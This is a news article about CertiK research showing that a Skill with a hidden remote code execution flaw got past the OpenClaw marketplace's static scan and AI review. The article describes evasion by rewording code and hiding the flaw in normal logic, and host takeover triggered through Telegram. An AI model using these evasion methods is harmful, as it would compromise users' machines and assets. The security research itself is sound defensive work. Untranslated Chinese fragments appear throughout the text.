CertiK Test: How the Vulnerable OpenClaw Skill Bypassed Review and Took Over Computers Without Authorization

marsbit2026-03-22 tarihinde yayınlandı2026-03-22 tarihinde güncellendi

Özet

CertiK's latest research reveals critical security vulnerabilities in OpenClaw's third-party Skill ecosystem. Despite OpenClaw's three-layer review system—including VirusTotal scanning, static code analysis, and AI logic checks—malicious Skills can easily bypass these safeguards. CertiK demonstrated this by developing a seemingly benign "test-web-searcher" Skill that contained a hidden remote code execution vulnerability. It was approved without warnings, allowing unauthorized command execution on the host machine (e.g., launching system calculators via Telegram commands). The core issue is the industry’s overreliance on pre-release scans rather than runtime isolation and strict permission controls. Unlike iOS’s mandatory sandboxing, OpenClaw’s sandbox is optional and often disabled by users for functionality, leaving systems exposed. CertiK urges developers to enforce mandatory sandboxing and granular permissions for Skills, and advises users to deploy OpenClaw on isolated devices away from sensitive data or assets. The study underscores that scanning alone cannot secure high-permission AI agents; runtime isolation and damage containment are essential for safety.

Recently, the open-source self-hosted AI agent platform OpenClaw (commonly known as "Crawfish") has rapidly gained popularity due to its flexible scalability and self-controlled deployment features, becoming a phenomenon in the personal AI agent space. Its core ecosystem, Clawhub, serves as an app marketplace, gathering a vast number of third-party Skill plugins that enable agents to unlock advanced capabilities—from web search and content creation to encrypted wallet operations, on-chain interactions, and system automation—with a single click. The ecosystem's scale and user base have experienced explosive growth.

But for such third-party Skills running in high-privilege environments, where exactly is the platform's real security boundary?

Recently, CertiK, the world's largest Web3 security company, released new research on Skill security. The report points out that the current market has a misplaced perception of the security boundaries of AI agent ecosystems: the industry generally regards "Skill scanning" as the core security boundary, but this mechanism is almost useless against hacker attacks.

If OpenClaw is compared to an operating system for smart devices, Skills are the various APPs installed on the system. Unlike ordinary consumer APPs, some Skills in OpenClaw run in high-privilege environments, directly accessing local files, calling system tools, connecting to external services, executing host environment commands, and even operating users' encrypted digital assets. Once security issues arise, they can directly lead to serious consequences such as sensitive information leakage, remote device takeover, and theft of digital assets.

The current universal security solution for third-party Skills across the industry is "pre-listing scanning and review." OpenClaw's Clawhub has also built a three-layer review and protection system: integrating VirusTotal code scanning, static code detection engines, and AI logic consistency checks. It uses risk grading to push security alerts to users, attempting to safeguard ecosystem security. However, CertiK's research and proof-of-concept attack tests confirm that this detection system has shortcomings in real attack-defense scenarios and cannot bear the core responsibility of security protection.

The research first breaks down the inherent limitations of the existing detection mechanisms:

Static detection rules are easily bypassed. This engine primarily relies on matching code features to identify risks, such as flagging the combination of "reading sensitive environmental information + sending network requests" as high-risk behavior. However, attackers only need to make slight syntactic modifications to the code to completely bypass feature matching while fully retaining malicious logic. It's like rephrasing dangerous content with synonymous expressions, rendering the security scanner completely ineffective.

AI review has inherent detection blind spots. Clawhub's AI review is primarily positioned as a "logic consistency detector," which can only catch obvious malicious code where "declared functionality does not match actual behavior." However, it is helpless against exploitable vulnerabilities hidden within normal business logic, much like how it is difficult to find fatal traps buried deep in the clauses of a seemingly compliant contract.

More critically, the review process has underlying design flaws: even when VirusTotal's scan results are still "pending" and the full "health check" process is incomplete, Skills can still be directly listed publicly. Users can install them without any warnings, leaving an opening for attackers.

To verify the real危害性 of the risks, the CertiK research team completed full testing. The team developed a Skill named "test-web-searcher," which表面上 appears to be a fully compliant web search tool with code logic that完全符合常规开发规范. However, it actually implants a remote code execution vulnerability within the normal functional flow.

This Skill bypassed the detection of both the static engine and the AI review. While the VirusTotal scan was still pending, it was installed normally without any security warnings. Ultimately, by sending a remote command via Telegram, the vulnerability was successfully triggered, achieving arbitrary command execution on the host device (in the demo, it directly controlled the system to launch the calculator).

CertiK clearly stated in the research that these issues are not unique product bugs of OpenClaw but rather a common cognitive误区 across the AI agent industry: the industry普遍 regards "review scanning" as the core security防线, while neglecting the true security根基, which is runtime mandatory isolation and fine-grained permission control. This is similar to how the security core of Apple's iOS ecosystem has never been the strict review of the App Store, but rather the system's enforced sandbox mechanism and fine-grained permission management, ensuring each APP runs in its dedicated "isolation pod" without随意获取系统权限. OpenClaw's existing sandbox mechanism is optional而非强制的 and highly reliant on manual user configuration. Most users, to ensure Skill functionality, choose to disable the sandbox, ultimately leaving the agent in a "naked" state. Once a Skill with vulnerabilities or malicious code is installed, it can directly lead to catastrophic consequences.

Regarding the issues discovered, CertiK also provided security guidance:

● For developers of AI agents like OpenClaw, sandbox isolation must be set as the default mandatory configuration for third-party Skills, with a fine-grained permission control model. Third-party code must never默认继承 the host machine's high privileges.

● For ordinary users, Skills labeled "safe" in the marketplace merely indicate that no risks were detected; it does not equate to absolute safety. Before官方 makes底层强隔离机制 the default configuration, it is recommended to deploy OpenClaw on non-critical idle devices or virtual machines. Never let it near sensitive files, password credentials, or high-value加密资产.

The AI agent赛道 is currently on the eve of explosion. The speed of ecosystem expansion must not outpace the pace of security construction. Review scanning can only block初级恶意攻击 but can never become the security boundary for high-privilege agents. Only by shifting from "pursuing perfect detection" to "assuming risk exists and focusing on damage containment," and by establishing隔离边界强制 at the runtime底层, can the security底线 of AI agents truly be safeguarded, allowing this technological transformation to proceed steadily and go the distance.

Original Research: https://x.com/hhj4ck/status/2033527312042315816?s=20

https://mp.weixin.qq.com/s/Wxrzt7bAo86h3bOKkx6 UoA

İlgili Okumalar

From Robinhood to Polymarket: Is the Era of Integrating All Assets on a Single Platform Coming?

From Robinhood to Polymarket: The Era of All-in-One Asset Platforms Is Coming Asset classes are rapidly converging. Platforms that once specialized in single categories—such as stocks, cryptocurrencies, or prediction markets—are now moving toward offering all three. Robinhood pioneered this model, starting with equities, adding crypto in 2018, and prediction markets in 2025. This strategy has proven resilient: when crypto revenues fell, other segments like options and stocks filled the gap. Now, prediction market leaders Polymarket and Kalshi are moving in the same direction, both announcing perpetual futures trading on April 21, 2026, pending regulatory approval. These futures will cover assets like Bitcoin, gold, and stocks such as Nvidia. This trend mirrors the consolidation seen in consumer tech, like smartphones replacing dedicated cameras and MP3 players. Younger users, accustomed to interacting with multiple asset types from an early age, will increasingly demand unified platforms. A key competitive advantage in prediction markets is collateral utilization—idle assets locked during betting periods. Polymarket’s move into perpetuals may be a strategy to generate yield from that capital, similar to earlier DeFi integrations like PolyAave. As the regulatory landscape evolves, traditional finance is also likely to incorporate crypto and prediction markets, further accelerating this convergence.

marsbit15 dk önce

From Robinhood to Polymarket: Is the Era of Integrating All Assets on a Single Platform Coming?

marsbit15 dk önce

OpenAI Goes Left, DeepSeek Goes Right

On April 24, 2026, DeepSeek released V4, a Chinese large language model offering a free "million-token context window," enabling it to process vast amounts of data like entire books or years of corporate documents in one go. In contrast, OpenAI’s GPT-5.5, released around the same time, is more powerful but significantly more expensive, charging up to $180 per million output tokens. DeepSeek’s strategy represents a shift from a pure AI research firm to a heavy-infrastructure player, building data centers in Inner Mongolia’s Ulanqab to bypass U.S. chip export restrictions. This move, supported by Huawei’s Ascend chips and China’s cheap green electricity, highlights a fundamental divergence in AI development models: U.S. firms focus on high-cost, high-margin services, while Chinese players like DeepSeek prioritize accessibility and affordability. Facing intense talent poaching from tech giants, DeepSeek is seeking a $44 billion valuation funding round to retain researchers and scale infrastructure. Meanwhile, Chinese manufacturers are compressing AI models to run on smartphones, making AI accessible offline and across the Global South. Through open-source models and localized solutions, Chinese AI is empowering non-English speakers and low-income users, driving a form of "digital equality." While Silicon Valley builds walled gardens, DeepSeek and others are turning AI into a public utility—like tap water—flowing freely to those previously left behind.

marsbit41 dk önce

OpenAI Goes Left, DeepSeek Goes Right

marsbit41 dk önce

$292 Million KelpDAO Cross-Chain Bridge Hack: Who Should Foot the Bill?

On April 18, 2026, an attacker stole 116,500 rsETH (worth ~$292M) from KelpDAO’s cross-chain bridge in 46 minutes—the largest DeFi exploit of 2026. The stolen assets were deposited into Aave V3 as collateral, causing $177–200M in bad debt and triggering a cascade of losses across nine DeFi protocols. Aave’s TVL dropped by ~$6B overnight. This legal analysis argues that KelpDAO and LayerZero Labs share concurrent liability, with fault apportioned 60%/40%. KelpDAO negligently configured its bridge with a 1-of-1 decentralized verifier network (DVN)—a single point of failure—despite LayerZero’s explicit recommendation of a 2-of-3 setup. LayerZero, which operated the compromised DVN, failed to secure its RPC infrastructure against a known poisoning attack vector. Both protocols’ terms of service cap liability at $200 (KelpDAO) or $50 (LayerZero), but these limits are likely unenforceable due to unconscionability, gross negligence exceptions, and potential securities law invalidation (if rsETH is deemed a security under the Howey test). Aave’s governance also faces fiduciary duty claims for raising rsETH’s loan-to-value ratio to 93%—far above competitors’ 72–75%—without adequately assessing bridge risks, amplifying the systemic fallout. Practical recovery targets include LayerZero Labs (a registered Canadian entity), KelpDAO’s founders, auditors, and identifiable Aave governance delegates. The incident underscores escalating legal risks for DeFi protocols, infrastructure providers, and governance participants.

marsbit1 saat önce

$292 Million KelpDAO Cross-Chain Bridge Hack: Who Should Foot the Bill?

marsbit1 saat önce

İşlemler

Spot
Futures
活动图片